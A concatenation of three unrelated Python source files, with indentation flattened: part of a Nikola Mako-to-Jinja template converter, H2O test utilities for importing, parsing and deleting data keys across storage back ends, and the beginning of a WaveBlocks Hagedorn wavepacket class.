inherit = re.compile(r'(.*)<% *inherit file="(.*?)".*/>(.*)', re.IGNORECASE)
block_single_line = re.compile(r'(.*)<% *block.*name="(.*?)".*>(.*)</% *block>(.*)', re.IGNORECASE)
block_start = re.compile(r'(.*)<% *block.*name="(.*?)".*>(.*)', re.IGNORECASE)
block_end = re.compile(r'(.*)</%block>(.*)', re.IGNORECASE)
val = re.compile(r'\$\{(.*?)\}', re.IGNORECASE)
func_len = re.compile(r'len\((.*?)\)', re.IGNORECASE)
filter_h = re.compile(r'\|h', re.IGNORECASE)
filter_striphtml = re.compile(r'\|striphtml', re.IGNORECASE)
filter_u = re.compile(r'\|u', re.IGNORECASE)
comment_single_line = re.compile(r'^.*##(.*?)$', re.IGNORECASE)
for line in input_file:
# Process line for repeated inline replacements
m_val = val.search(line)
m_func_len = func_len.search(line)
m_filter_h = filter_h.search(line)
m_filter_striphtml = filter_striphtml.search(line)
m_filter_u = filter_u.search(line)
if m_val:
line = val.sub(r'{{ \1 }}', line)
if m_filter_h:
line = filter_h.sub(r'|e', line)
if m_filter_striphtml:
line = filter_striphtml.sub(r'|e', line)
if m_filter_u:
line = filter_u.sub(r'|urlencode', line)
if m_func_len:
line = func_len.sub(r'\1|length', line)
# Process line for single 'whole line' replacements
m_macro_start = macro_start.search(line)
m_macro_end = macro_end.search(line)
m_if_start = if_start.search(line)
m_if_else = if_else.search(line)
m_if_elif = if_elif.search(line)
m_if_end = if_end.search(line)
m_for_start = for_start.search(line)
m_for_end = for_end.search(line)
m_namspace = namespace.search(line)
m_inherit = inherit.search(line)
m_block_single_line = block_single_line.search(line)
m_block_start = block_start.search(line)
m_block_end = block_end.search(line)
m_comment_single_line = comment_single_line.search(line)
if m_comment_single_line:
output += m_comment_single_line.expand(r'{# \1 #}') + '\n'
elif m_macro_start:
output += m_macro_start.expand(r'\1{% macro \2 %}\3') + '\n'
elif m_macro_end:
output += m_macro_end.expand(r'\1{% endmacro %}\2') + '\n'
elif m_if_start:
output += m_if_start.expand(r'\1{% if \2 %}\3') + '\n'
elif m_if_else:
output += m_if_else.expand(r'\1{% else %}\2') + '\n'
elif m_if_elif:
output += m_if_elif.expand(r'\1{% elif \2 %}\3') + '\n'
elif m_if_end:
output += m_if_end.expand(r'\1{% endif %}\2') + '\n'
elif m_for_start:
output += m_for_start.expand(r'\1{% for \2 %}\3') + '\n'
elif m_for_end:
output += m_for_end.expand(r'\1{% endfor %}\2') + '\n'
elif m_namspace:
output += m_namspace.expand(r"\1{% import '\3' as \2 with context %}\4") + '\n'
elif m_inherit:
output += m_inherit.expand(r"{% extends '\2' %}\3") + '\n'
elif m_block_single_line:
output += m_block_single_line.expand(r'\1{% block \2 %}\3{% endblock %}\4') + '\n'
elif m_block_start:
output += m_block_start.expand(r'\1{% block \2 %}\3') + '\n'
elif m_block_end:
output += m_block_end.expand(r'\1{% endblock %}\2') + '\n'
else:
# Doesn't match anything we're going to process, pass through
output += line
return output
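# Illustrative sketch of what mako2jinja does to a few (hypothetical) Mako
# lines, per the regexes above (output shown approximately):
#
#     % if post.title:     ->  {% if post.title %}
#     % for p in posts:    ->  {% for p in posts %}
#     % endfor             ->  {% endfor %}
#     ${post.title|h}      ->  {{ post.title|e }}
#     ## a Mako comment    ->  {# a Mako comment #}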
def jinjify_shortcodes(in_dir, out_dir):
for fname in os.listdir(in_dir):
if not fname.endswith('.tmpl'):
continue
in_file = os.path.join(in_dir, fname)
out_file = os.path.join(out_dir, fname)
with open(in_file) as inf:
data = mako2jinja(inf)
with open(out_file, 'w') as outf:
outf.write(data)
def usage():
print("Usage: python {} [in-dir] [out-dir]".format(sys.argv[0]))
print("OR")
print("Usage: python {} [in-file] [out-file]".format(sys.argv[0]))
if __name__ == "__main__":
if len(sys.argv) == 1:
print('Performing standard conversions:')
for m, j in (
('nikola/data/themes/base', 'nikola/data/themes/base-jinja'),
('nikola/data/themes/bootstrap3', 'nikola/data/themes/bootstrap3-jinja')
):
print(' {0} -> {1}'.format(m, j))
jinjify(m, j)
jinjify_shortcodes('nikola/data/shortcodes/mako', 'nikola/data/shortcodes/jinja')
elif len(sys.argv) != 3:
print('ERROR: needs input and output directory (file), or no arguments for default conversions.')
usage()
elif os.path.isdir(sys.argv[1]) and (os.path.isdir(sys.argv[2]) or not os.path.exists(sys.argv[2])):
jinjify(sys.argv[1], sys.argv[2])
elif os.path.isfile(sys.argv[1]) and (os.path.isfile(sys.argv[2]) or not os.path.exists(sys.argv[2])):
tmpdir = tempfile.mkdtemp()
indir = os.path.sep.join((tmpdir, 'in', 'templates'))
outdir = os.path.sep.join((tmpdir, 'out', 'templates'))
os.makedirs(indir)
shutil.copy(sys.argv[1], indir)
jinjify(os.path.dirname(indir), os.path.dirname(outdir))
shutil.move(os.path.sep.join((outdir, os.path.basename(sys.argv[1]))), sys.argv[2])
else:
print('ERROR: the two arguments must be both directories or files')
usage()
|
|
import h2o, h2o_cmd, re, os
import h2o_print as h2p
import getpass, time
#****************************************************************************************
# hdfs/maprfs/s3/s3n paths should be absolute from the bucket (top level)
# so only walk around for local
# using this standalone, we probably want 'put' decision making by default (can always pass schema='local')
def find_folder_and_filename(bucket, pathWithRegex, schema='put', returnFullPath=False):
checkPath = True
# strip the common mistake of leading "/" in path, if bucket is specified too
giveUpAndSearchLocally = False
if bucket is not None and re.match("/", pathWithRegex):
h2o.verboseprint("You said bucket:", bucket, "so stripping incorrect leading '/' from", pathWithRegex)
pathWithRegex = pathWithRegex.lstrip('/')
if bucket is None: # good for absolute path name
bucketPath = ""
elif bucket == ".":
bucketPath = os.getcwd()
# only use if the build_cloud was for remote H2O
# Never use the var for remote, if you're doing a put! (which always sources local)
elif h2o.nodes[0].remoteH2O and schema!='put' and \
(os.environ.get('H2O_REMOTE_BUCKETS_ROOT') or h2o.nodes[0].h2o_remote_buckets_root):
if (bucket=='smalldata' or bucket=='datasets') and schema=='local':
msg1 = "\nWARNING: you're using remote nodes, and 'smalldata' or 'datasets' git buckets, with schema!=put"
msg2 = "\nThose aren't git pull'ed by the test. Since they are user-maintained, not globally-maintained-by-0xdata,"
msg3 = "\nthey may be out of date at those remote nodes?"
msg4 = "\nGoing to assume we find a path to them locally, and remote path will be the same"
h2p.red_print(msg1, msg2, msg3, msg4)
giveUpAndSearchLocally = True
else:
if os.environ.get('H2O_REMOTE_BUCKETS_ROOT'):
rootPath = os.environ.get('H2O_REMOTE_BUCKETS_ROOT')
print "Found H2O_REMOTE_BUCKETS_ROOT:", rootPath
else:
rootPath = h2o.nodes[0].h2o_remote_buckets_root
print "Found h2o_nodes[0].h2o_remote_buckets_root:", rootPath
bucketPath = os.path.join(rootPath, bucket)
checkPath = False
# does it work to use bucket "." to get current directory
# this covers remote with put too
elif os.environ.get('H2O_BUCKETS_ROOT'):
rootPath = os.environ.get('H2O_BUCKETS_ROOT')
print "Using H2O_BUCKETS_ROOT environment variable:", rootPath
if not (os.path.exists(rootPath)):
raise Exception("H2O_BUCKETS_ROOT in env but %s doesn't exist." % rootPath)
bucketPath = os.path.join(rootPath, bucket)
if not (os.path.exists(bucketPath)):
raise Exception("H2O_BUCKETS_ROOT and path used to form %s which doesn't exist." % bucketPath)
else:
giveUpAndSearchLocally = True
#******************************************************************************************
if giveUpAndSearchLocally:
# if we run remotely, we're assuming the import folder path on the remote machine
# matches what we find on our local machine. But maybe the local user doesn't exist remotely
# so using his path won't work.
# Resolve by looking for special state in the config. If user = 0xdiag, just force the bucket location
# This is a lot like knowing about fixed paths with s3 and hdfs
# Otherwise the remote path needs to match the local discovered path.
# want to check the username being used remotely first. should exist here too if going to use
username = getpass.getuser()
h2oUsername = h2o.nodes[0].username
h2o.verboseprint("username:", username, "h2oUsername:", h2oUsername)
# bucket named "datasets" is special. Don't want to find it in /home/0xdiag/datasets
# needs to be the git clone 'datasets'. Find it by walking upwards below
# disable it from this looking in home dir. Could change priority order?
# resolved in order, looking for bucket (ln -s will work) in these home dirs.
if bucket=='datasets': # special case
possibleUsers = []
elif h2oUsername != username:
possibleUsers = [username, h2oUsername, "0xdiag"]
else:
possibleUsers = [username, "0xdiag"]
for u in possibleUsers:
rootPath = os.path.expanduser("~" + u)
bucketPath = os.path.join(rootPath, bucket)
h2o.verboseprint("Checking bucketPath:", bucketPath, 'assuming home is', rootPath)
if os.path.exists(bucketPath):
h2o.verboseprint("search A did find", bucket, "at", rootPath)
break
else:
# last chance to find it by snooping around
rootPath = os.getcwd()
h2o.verboseprint("find_bucket looking upwards from", rootPath, "for", bucket)
# don't spin forever
levels = 0
while not (os.path.exists(os.path.join(rootPath, bucket))):
h2o.verboseprint("Didn't find", bucket, "at", rootPath)
rootPath = os.path.split(rootPath)[0]
levels += 1
if (levels==6):
raise Exception("unable to find bucket: %s. Maybe missing link in /home/0xdiag or /home/0xcustomer or jenkins ~? or whatever user is running the python or the h2o?" % bucket)
h2o.verboseprint("search B did find", bucket, "at", rootPath)
bucketPath = os.path.join(rootPath, bucket)
#******************************************************************************************
# if there's no path, just return the bucketPath
# but what about cases with a header in the folder too? (not putfile)
if pathWithRegex is None:
if returnFullPath:
return bucketPath
else:
return (bucketPath, None)
# if there is a "/" in the path, that means it's not just a pattern
# split it
# otherwise it is a pattern. use it to search for files in python first?
# FIX! do that later
elif "/" in pathWithRegex:
(head, tail) = os.path.split(pathWithRegex)
folderPath = os.path.abspath(os.path.join(bucketPath, head))
# accept all 0xcustomer-datasets without checking, since the current python user
# may not have permission, but h2o will.
# try a couple times with os.stat in between, in case it's not automounting
if '/mnt/0xcustomer-datasets' in folderPath:
pass
else:
retry = 0
while checkPath and (not os.path.exists(folderPath)) and retry<5:
# we can't stat an actual file, because we could have a regex at the end of the pathname
print "Retrying", folderPath, "in case there's a autofs mount problem"
os.stat(folderPath)
retry += 1
time.sleep(1)
if checkPath and not os.path.exists(folderPath):
raise Exception("%s doesn't exist. %s under %s may be wrong?" % (folderPath, head, bucketPath))
else:
folderPath = bucketPath
tail = pathWithRegex
h2o.verboseprint("folderPath:", folderPath, "tail:", tail)
if returnFullPath:
return os.path.join(folderPath, tail)
else:
return (folderPath, tail)
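# Illustrative usage sketch (bucket and path are hypothetical): with a local
# 'smalldata' bucket cloned under the current user's home directory,
#
#     (folderPath, tail) = find_folder_and_filename('smalldata', 'iris/iris2.csv')
#
# returns roughly ('/home/<user>/smalldata/iris', 'iris2.csv'), while
# returnFullPath=True would return the single joined path instead of a tuple.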
#****************************************************************************************
# passes additional params thru kwargs for parse
# use_header_file=
# header=
# exclude=
# src_key= only used if for put file key name (optional)
# path should point to a file or regex of files. (maybe folder works? but unnecessary
def import_only(node=None, schema='local', bucket=None, path=None,
timeoutSecs=30, retryDelaySecs=0.5, initialDelaySecs=0.5, pollTimeoutSecs=180, noise=None,
benchmarkLogging=None, noPoll=False, doSummary=True, src_key=None, noPrint=False,
importParentDir=True, **kwargs):
if src_key and schema!='put':
raise Exception("can only specify a 'src_key' param for schema='put'. You have %s %s" % (schema, src_key))
# no bucket is sometimes legal (fixed path)
if not node: node = h2o.nodes[0]
if path is None:
raise Exception("import_only: path parameter needs to be specified")
if "/" in path:
(head, pattern) = os.path.split(path)
else:
(head, pattern) = ("", path)
h2o.verboseprint("head:", head)
h2o.verboseprint("pattern:", pattern)
# to train users / okay here
# normally we import the folder above, but if we import exactly, the path can't have regex
# the folder can't have regex in any case
if importParentDir:
if re.search(r"[\*<>{}[\]~`]", head):
raise Exception("h2o folder path %s can't be regex. path= was %s" % (head, path))
else:
if re.search(r"[\*<>{}[\]~`]", path):
raise Exception("h2o path %s can't be regex. path= was %s" % (head, path))
if schema=='put':
# to train users
if re.search(r"[/\*<>{}[\]~`]", pattern):
raise Exception("h2o putfile basename %s can't be regex. path= was %s" % (pattern, path))
if not path:
raise Exception("path= didn't say what file to put")
(folderPath, filename) = find_folder_and_filename(bucket, path, schema)
filePath = os.path.join(folderPath, filename)
h2o.verboseprint("put filename:", filename, "folderPath:", folderPath, "filePath:", filePath)
if not noPrint:
h2p.green_print("\nimport_only:", h2o.python_test_name, "uses put:/%s" % filePath)
h2p.green_print("Local path to file that will be uploaded: %s" % filePath)
h2p.blue_print("That path resolves as:", os.path.realpath(filePath))
if h2o.abort_after_import:
raise Exception("Aborting due to abort_after_import (-aai) argument's effect in import_only()")
key = node.put_file(filePath, key=src_key, timeoutSecs=timeoutSecs)
return (None, key)
if schema=='local' and not \
(node.redirect_import_folder_to_s3_path or node.redirect_import_folder_to_s3n_path):
(folderPath, pattern) = find_folder_and_filename(bucket, path, schema)
filePath = os.path.join(folderPath, pattern)
h2p.green_print("\nimport_only:", h2o.python_test_name, "uses local:/%s" % filePath)
h2p.green_print("Path h2o will be told to use: %s" % filePath)
h2p.blue_print("If local jvms, path resolves locally as:", os.path.realpath(filePath))
if h2o.abort_after_import:
raise Exception("Aborting due to abort_after_import (-aai) argument's effect in import_only()")
folderURI = 'nfs:/' + folderPath
if importParentDir:
importResult = node.import_files(folderPath, timeoutSecs=timeoutSecs)
else:
importResult = node.import_files(folderPath + "/" + pattern, timeoutSecs=timeoutSecs)
else:
if bucket is not None and re.match("/", head):
h2o.verboseprint("You said bucket:", bucket, "so stripping incorrect leading '/' from", head)
head = head.lstrip('/')
# strip leading / in head if present
if bucket and head!="":
folderOffset = bucket + "/" + head
elif bucket:
folderOffset = bucket
else:
folderOffset = head
print "\nimport_only:", h2o.python_test_name, schema, "uses", schema + "://" + folderOffset + "/" + pattern
if h2o.abort_after_import:
raise Exception("Aborting due to abort_after_import (-aai) argument's effect in import_only()")
n = h2o.nodes[0]
if schema=='s3' or node.redirect_import_folder_to_s3_path:
folderURI = "s3://" + folderOffset
if not n.aws_credentials:
print "aws_credentials: %s" % n.aws_credentials
# raise Exception("Something was missing for s3 on the java -jar cmd line when the cloud was built")
print "ERROR: Something was missing for s3 on the java -jar cmd line when the cloud was built"
if importParentDir:
importResult = node.import_files(folderURI, timeoutSecs=timeoutSecs)
else:
importResult = node.import_files(folderURI + "/" + pattern, timeoutSecs=timeoutSecs)
elif schema=='s3n' or node.redirect_import_folder_to_s3n_path:
if not (n.use_hdfs and ((n.hdfs_version and n.hdfs_name_node) or n.hdfs_config)):
print "use_hdfs: %s hdfs_version: %s hdfs_name_node: %s hdfs_config: %s" % \
(n.use_hdfs, n.hdfs_version, n.hdfs_name_node, n.hdfs_config)
# raise Exception("Something was missing for s3n on the java -jar cmd line when the cloud was built")
print "ERROR: Something was missing for s3n on the java -jar cmd line when the cloud was built"
folderURI = "s3n://" + folderOffset
if importParentDir:
importResult = node.import_files(folderURI, timeoutSecs=timeoutSecs)
else:
importResult = node.import_files(folderURI + "/" + pattern, timeoutSecs=timeoutSecs)
elif schema=='maprfs':
if not n.use_maprfs:
print "use_maprfs: %s" % n.use_maprfs
# raise Exception("Something was missing for maprfs on the java -jar cmd line when the cloud was built")
print "ERROR: Something was missing for maprfs on the java -jar cmd line when the cloud was built"
# if I use the /// and default, the key names that get created by h2o only have 1 slash
# so the parse doesn't find the key name
if n.hdfs_name_node:
folderURI = "maprfs://" + n.hdfs_name_node + "/" + folderOffset
else:
# this is different than maprfs? normally we specify the name though
# folderURI = "maprfs:///" + folderOffset
folderURI = "maprfs:/" + folderOffset
if importParentDir:
importResult = node.import_files(folderURI, timeoutSecs=timeoutSecs)
else:
importResult = node.import_files(folderURI + "/" + pattern, timeoutSecs=timeoutSecs)
elif schema=='hdfs':
# check that some state from the cloud building time was right
# the requirements for this may change and require updating
if not (n.use_hdfs and ((n.hdfs_version and n.hdfs_name_node) or n.hdfs_config)):
print "use_hdfs: %s hdfs_version: %s hdfs_name_node: %s hdfs_config: %s" % \
(n.use_hdfs, n.hdfs_version, n.hdfs_name_node, n.hdfs_config)
# raise Exception("Something was missing for hdfs on the java -jar cmd line when the cloud was built")
print "ERROR: Something was missing for hdfs on the java -jar cmd line when the cloud was built"
if n.hdfs_name_node:
folderURI = "hdfs://" + n.hdfs_name_node + "/" + folderOffset
else:
# this is different than maprfs? normally we specify the name though
folderURI = "hdfs://" + folderOffset
if importParentDir:
importResult = node.import_files(folderURI, timeoutSecs=timeoutSecs)
else:
importResult = node.import_files(folderURI + "/" + pattern, timeoutSecs=timeoutSecs)
else:
raise Exception("schema not understood: %s" % schema)
importPattern = folderURI + "/" + pattern
return (importResult, importPattern)
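# Illustrative sketch of the folderURI forms built above for a (hypothetical)
# bucket 'smalldata' and head 'parse_folder', i.e. folderOffset =
# 'smalldata/parse_folder':
#
#     schema='s3'     ->  s3://smalldata/parse_folder
#     schema='s3n'    ->  s3n://smalldata/parse_folder
#     schema='maprfs' ->  maprfs://<hdfs_name_node>/smalldata/parse_folder
#     schema='hdfs'   ->  hdfs://<hdfs_name_node>/smalldata/parse_folder
#     schema='local'  ->  nfs:/<resolved local folder path>
#
# and the importPattern handed back for parsing is folderURI + "/" + pattern.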
#****************************************************************************************
# can take header, header_from_file, exclude params
def parse_only(node=None, pattern=None, hex_key=None,
timeoutSecs=30, retryDelaySecs=0.5, initialDelaySecs=0.5, pollTimeoutSecs=180, noise=None,
benchmarkLogging=None, noPoll=False, **kwargs):
if not node: node = h2o.nodes[0]
parseResult = node.parse(key=pattern, key2=hex_key,
timeoutSecs=timeoutSecs, retryDelaySecs=retryDelaySecs,
initialDelaySecs=initialDelaySecs, pollTimeoutSecs=pollTimeoutSecs, noise=noise,
benchmarkLogging=benchmarkLogging, noPoll=noPoll, **kwargs)
parseResult['python_source'] = pattern
return parseResult
#****************************************************************************************
def import_parse(node=None, schema='local', bucket=None, path=None,
src_key=None, hex_key=None,
timeoutSecs=30, retryDelaySecs=0.5, initialDelaySecs=0.5, pollTimeoutSecs=180, noise=None,
benchmarkLogging=None, noPoll=False, doSummary=True, noPrint=True,
importParentDir=True, **kwargs):
if not node: node = h2o.nodes[0]
(importResult, importPattern) = import_only(node, schema, bucket, path,
timeoutSecs, retryDelaySecs, initialDelaySecs, pollTimeoutSecs, noise,
benchmarkLogging, noPoll, doSummary, src_key, noPrint, importParentDir, **kwargs)
h2o.verboseprint("importPattern:", importPattern)
h2o.verboseprint("importResult", h2o.dump_json(importResult))
parseResult = parse_only(node, importPattern, hex_key,
timeoutSecs, retryDelaySecs, initialDelaySecs, pollTimeoutSecs, noise,
benchmarkLogging, noPoll, **kwargs)
h2o.verboseprint("parseResult:", h2o.dump_json(parseResult))
# do SummaryPage here too, just to get some coverage
# only if not noPoll. otherwise parse isn't done
if doSummary and not noPoll:
# if parse blows up, we want error isolation ..i.e. find stack traces here, rather than the next guy blowing up
h2o.check_sandbox_for_errors()
inspect = node.inspect(parseResult['destination_key'], timeoutSecs=timeoutSecs)
numRows = inspect['numRows']
numCols = inspect['numCols']
# we pass numCols, for detecting whether the na cnt means a col is all NAs, (for ignoring min/max/mean/sigma)
node.summary_page(parseResult['destination_key'], timeoutSecs=timeoutSecs, noPrint=noPrint, numRows=numRows, numCols=numCols)
# for now, don't worry about error isolating summary
else:
# isolate a parse from the next thing
h2o.check_sandbox_for_errors()
return parseResult
# returns full key name, from current store view
def find_key(pattern=None):
found = None
kwargs = {'filter': pattern}
storeViewResult = h2o.nodes[0].store_view(**kwargs)
keys = storeViewResult['keys']
if len(keys) == 0:
return None
if len(keys) > 1:
h2o.verboseprint("Warning: multiple imported keys match the key pattern given, Using: %s" % keys[0]['key'])
return keys[0]['key']
#****************************************************************************************
# the storeViewResult for every node may or may not be the same
# supposed to be the same? In any case
# pattern can't be regex to h2o?
# None should be same as no pattern
def delete_keys(node=None, pattern=None, timeoutSecs=120):
if not node: node = h2o.nodes[0]
kwargs = {'filter': pattern}
deletedCnt = 0
triedKeys = []
while True:
# FIX! h2o is getting a bad store_view NPE stack trace if I grab all the
# keys at the end of a test, prior to removing. Just grab 20 at a time like h2o
# used to do for me. Maybe the keys are changing state, and going slower will eliminate the race
# against prior work (but note that R might see the same problem).
storeViewResult = h2o_cmd.runStoreView(node, timeoutSecs=timeoutSecs, view=20, **kwargs)
# we get 20 at a time with default storeView
keys = storeViewResult['keys']
if not keys:
break
# look for keys we already sent a remove on. Maybe those are locked.
# give up on those
deletedThisTime = 0
for k in keys:
if k in triedKeys:
print "Already tried to delete %s. Must have failed. Not trying again" % k
# don't delete the DRF __Tree__ keys. deleting the model does that. causes race conditions
elif '__Tree__' in k['key']:
print "Not deleting a tree key from DRF: %s" % k
elif 'DRF_' in k['key']:
print "Not deleting DRF key..they may be problematic in flight: %s" % k
elif '__RFModel__' in k['key']:
print "Not deleting __RFModel__ key..seeing NPE's if I try to delete them: %s" % k
else:
print "Deleting", k['key'], "at", node
node.remove_key(k['key'], timeoutSecs=timeoutSecs)
deletedCnt += 1
deletedThisTime += 1
triedKeys.append(k)
# print "Deleted", deletedCnt, "keys at %s:%s" % (node.http_addr, node.port)
if deletedThisTime==0:
break
# this is really the count that we attempted. Some could have failed.
return deletedCnt
# if pattern is used, don't use the heavy h2o method
def delete_keys_at_all_nodes(node=None, pattern=None, timeoutSecs=120):
time.sleep(5)
# TEMP: change this to remove_all_keys which ignores locking and removes keys?
# getting problems when tests fail in multi-test-on-one-h2o-cluster runner*sh tests
if not node: node = h2o.nodes[0]
totalDeletedCnt = 0
# do it in reverse order, since we always talk to 0 for other stuff
# this will be interesting if the others don't have a complete set
# theoretically, the deletes should be 0 after the first node
# since the deletes should be global
for node in reversed(h2o.nodes):
deletedCnt = delete_keys(node, pattern=pattern, timeoutSecs=timeoutSecs)
totalDeletedCnt += deletedCnt
if pattern:
print "Total: Deleted", totalDeletedCnt, "keys with filter=", pattern, "at", len(h2o.nodes), "nodes"
else:
print "Total: Deleted", totalDeletedCnt, "keys at", len(h2o.nodes), "nodes"
# do a remove_all_keys to clean out any locked keys also (locked keys will complain above)
# doesn't work if you remove job keys first, since it looks at the job list and gets confused
### node.remove_all_keys(timeoutSecs=timeoutSecs)
return totalDeletedCnt
def count_keys(node=None, pattern=None, timeoutSecs=90):
if not node: node = h2o.nodes[0]
kwargs = {'filter': pattern}
nodeCnt = 0
offset = 0
while True:
# we get 20 at a time with default storeView
# if we get < 20, we're done
storeViewResult = h2o_cmd.runStoreView(node, timeoutSecs=timeoutSecs, offset=offset, view=20, **kwargs)
keys = storeViewResult['keys']
if not keys:
break
nodeCnt += len(storeViewResult['keys'])
if len(keys) < 20:
break
offset += 20
print nodeCnt, "keys at %s:%s" % (node.http_addr, node.port)
return nodeCnt
def count_keys_at_all_nodes(node=None, pattern=None, timeoutSecs=90):
if not node: node = h2o.nodes[0]
totalCnt = 0
# do it in reverse order, since we always talk to 0 for other stuff
# this will be interesting if the others don't have a complete set
# theoretically, the deletes should be 0 after the first node
# since the deletes should be global
for node in reversed(h2o.nodes):
nodeCnt = count_keys(node, pattern=pattern, timeoutSecs=timeoutSecs)
totalCnt += nodeCnt
if pattern:
print "Total: ", totalCnt, "keys with filter=", pattern, "at", len(h2o.nodes), "nodes"
else:
print "Total: ", totalCnt, "keys at", len(h2o.nodes), "nodes"
return totalCnt
#****************************************************************************************
# Since we can't trust a single node storeview list, this will get keys that match text
# for deleting, from a list saved from an import
def delete_keys_from_import_result(node=None, pattern=None, importResult=None, timeoutSecs=30):
if not node: node = h2o.nodes[0]
# the list could be from hdfs/s3 or local. They have two different list structures
deletedCnt = 0
if 'succeeded' in importResult:
kDict = importResult['succeeded']
for k in kDict:
key = k['key']
if pattern is None or pattern in key:
print "Removing", key
removeKeyResult = node.remove_key(key=key)
deletedCnt += 1
elif 'keys' in importResult:
kDict = importResult['keys']
for k in kDict:
key = k
if pattern is None or pattern in key:
print "Removing", key
removeKeyResult = node.remove_key(key=key)
deletedCnt += 1
else:
raise Exception("Can't find 'keys' or 'succeeded' in the importResult dict. Why? Not from hdfs/s3 or local?")
print "Deleted", deletedCnt, "keys at", node
return deletedCnt
|
|
"""The WaveBlocks Project
This file contains the class which represents a homogeneous Hagedorn wavepacket.
@author: R. Bourquin
@copyright: Copyright (C) 2010, 2011 R. Bourquin
@license: Modified BSD License
"""
from functools import partial
from numpy import zeros, complexfloating, array, sum, transpose, arange
from scipy import pi, sqrt, exp, conj, dot
from scipy.linalg import norm
from ComplexMath import cont_sqrt
from Wavepacket import Wavepacket
from HomogeneousQuadrature import HomogeneousQuadrature
import GlobalDefaults as GD
class HagedornWavepacket(Wavepacket):
r"""
This class represents homogeneous vector valued wavepackets :math:`|\Psi\rangle`.
"""
def __init__(self, parameters):
r"""
Initialize the ``HagedornWavepacket`` object that represents :math:`|\Psi\rangle`.
:param parameters: A ``ParameterProvider`` instance or a dict containing simulation parameters.
:raise ValueError: For :math:`N < 1` or :math:`K < 2`.
"""
#: Number of components :math:`\Phi_i` the wavepacket :math:`|\Psi\rangle` has.
self.number_components = parameters["ncomponents"]
if self.number_components < 1:
raise ValueError("Number of components of the Hagedorn wavepacket has to be >= 1.")
# Size of the basis from which we construct the wavepacket.
# If there is a key "basis_size" in the input parameters, the corresponding
# value can be either a single int or a list of ints. If there is no such key
# we use the values from the global defaults.
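# For example (hypothetical values): with ncomponents=2, "basis_size": 8 becomes
# [8, 8], while "basis_size": [8, 12] is taken as given; omitting the key falls
# back to GD.default_basis_size for every component.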
if parameters.has_key("basis_size"):
bs = parameters["basis_size"]
if type(bs) is list or type(bs) is tuple:
if not len(bs) == self.number_components:
raise ValueError("Number of value(s) for basis size(s) does not match.")
self.basis_size = bs[:]
else:
self.basis_size = self.number_components * [ bs ]
else:
self.basis_size = self.number_components * [ GD.default_basis_size ]
if any([bs < 2 for bs in self.basis_size]):
raise ValueError("Number of basis functions for Hagedorn wavepacket has to be >= 2.")
# Cache the parameter values epsilon we will use over and over again.
self.eps = parameters["eps"]
#: The parameter set Pi initialized to the Harmonic Oscillator Eigenfunctions
self.P, self.Q, self.S, self.p, self.q = GD.default_Pi
#: The coefficients :math:`c^i` of the linear combination for each component :math:`\Phi_k`.
self.coefficients = [ zeros((self.basis_size[index],1), dtype=complexfloating) for index in xrange(self.number_components) ]
#: An object that can compute brakets via quadrature.
self.quadrature = None
self._cont_sqrt_cache = 0.0
def __str__(self):
r"""
:return: A string describing the Hagedorn wavepacket.
"""
s = "Homogeneous Hagedorn wavepacket with "+str(self.number_components)+" components\n"
return s
def clone(self, keepid=False):
# Parameters of this packet
params = {"ncomponents": self.number_components,
"eps": self.eps}
# Create a new Packet
other = HagedornWavepacket(params)
# If we wish to keep the packet ID
if keepid is True:
other.set_id(self.get_id())
# And copy over all (private) data
other.set_basis_size(self.get_basis_size())
other.set_quadrature(self.get_quadrature())
other.set_parameters(self.get_parameters())
other.set_coefficients(self.get_coefficients())
other._cont_sqrt_cache = self._cont_sqrt_cache
return other
def get_parameters(self, component=None, aslist=False):
r"""
Get the Hagedorn parameters :math:`\Pi` of the wavepacket :math:`\Psi`.
:param component: Dummy parameter for API compatibility with the inhomogeneous packets.
:param aslist: Return a list of :math:`N` parameter tuples. This is for API compatibility with inhomogeneous packets.
:return: The Hagedorn parameters :math:`P`, :math:`Q`, :math:`S`, :math:`p`, :math:`q` of :math:`\Psi` in this order.
"""
if aslist is True:
return self.number_components * [(self.P, self.Q, self.S, self.p, self.q)]
return (self.P, self.Q, self.S, self.p, self.q)
def set_parameters(self, parameters, component=None):
r"""
Set the Hagedorn parameters :math:`\Pi` of the wavepacket :math:`\Psi`.
:param parameters: The Hagedorn parameters :math:`P`, :math:`Q`, :math:`S`, :math:`p`, :math:`q` of :math:`\Psi` in this order.
:param component: Dummy parameter for API compatibility with the inhomogeneous packets.
"""
(self.P, self.Q, self.S, self.p, self.q) = parameters
def set_quadrature(self, quadrature):
r"""
Set the ``HomogeneousQuadrature`` instance used for evaluating brakets.
:param quadrature: The new ``HomogeneousQuadrature`` instance. May be ``None``
to use a default one with a quadrature rule of order :math:`K+4`.
"""
# TODO: Put an "extra accuracy" parameter into global defaults with value of 4.
# TODO: Improve on the max(basis_size) later
# TODO: Rethink if wavepackets should contain a QR
if quadrature is None:
self.quadrature = HomogeneousQuadrature(order=max(self.basis_size) + 4)
else:
self.quadrature = quadrature
def get_quadrature(self):
r"""
Return the ``HomogeneousQuadrature`` instance used for evaluating brakets.
:return: The current instance ``HomogeneousQuadrature``.
"""
return self.quadrature
def evaluate_basis_at(self, nodes, component=None, prefactor=False):
r"""
Evaluate the Hagedorn functions :math:`\phi_k` recursively at the given nodes :math:`\gamma`.
:param nodes: The nodes :math:`\gamma` at which the Hagedorn functions are evaluated.
:param component: Takes the basis size :math:`K_i` of this component :math:`i` as upper bound for :math:`K`.
:param prefactor: Whether to include a factor of :math:`\left(\det\left(Q\right)\right)^{-\frac{1}{2}}`.
:return: A two-dimensional :math:`K` times #nodes array :math:`H` where the entry :math:`H[k,i]` is
the value of the :math:`k`-th Hagedorn function evaluated at the node :math:`i`.
"""
if component is not None:
basis_size = self.basis_size[component]
else:
# Evaluate up to maximal :math:`K_i` and slice later if necessary
basis_size = max(self.basis_size)
H = zeros((basis_size, nodes.size), dtype=complexfloating)
Qinv = self.Q**(-1.0)
Qbar = conj(self.Q)
nodes = nodes.reshape((1,nodes.size))
H[0] = pi**(-0.25)*self.eps**(-0.5) * exp(1.0j/self.eps**2 * (0.5*self.P*Qinv*(nodes-self.q)**2 + self.p*(nodes-self.q)))
H[1] = Qinv*sqrt(2.0/self.eps**2) * (nodes-self.q) * H[0]
for k in xrange(2, basis_size):
H[k] = Qinv*sqrt(2.0/self.eps**2)*1.0/sqrt(k) * (nodes-self.q) * H[k-1] - Qinv*Qbar*sqrt((k-1.0)/k) * H[k-2]
if prefactor is True:
sqrtQ, self._cont_sqrt_cache = cont_sqrt(self.Q, reference=self._cont_sqrt_cache)
H = 1.0/sqrtQ*H
return H
def evaluate_at(self, nodes, component=None, prefactor=False):
r"""
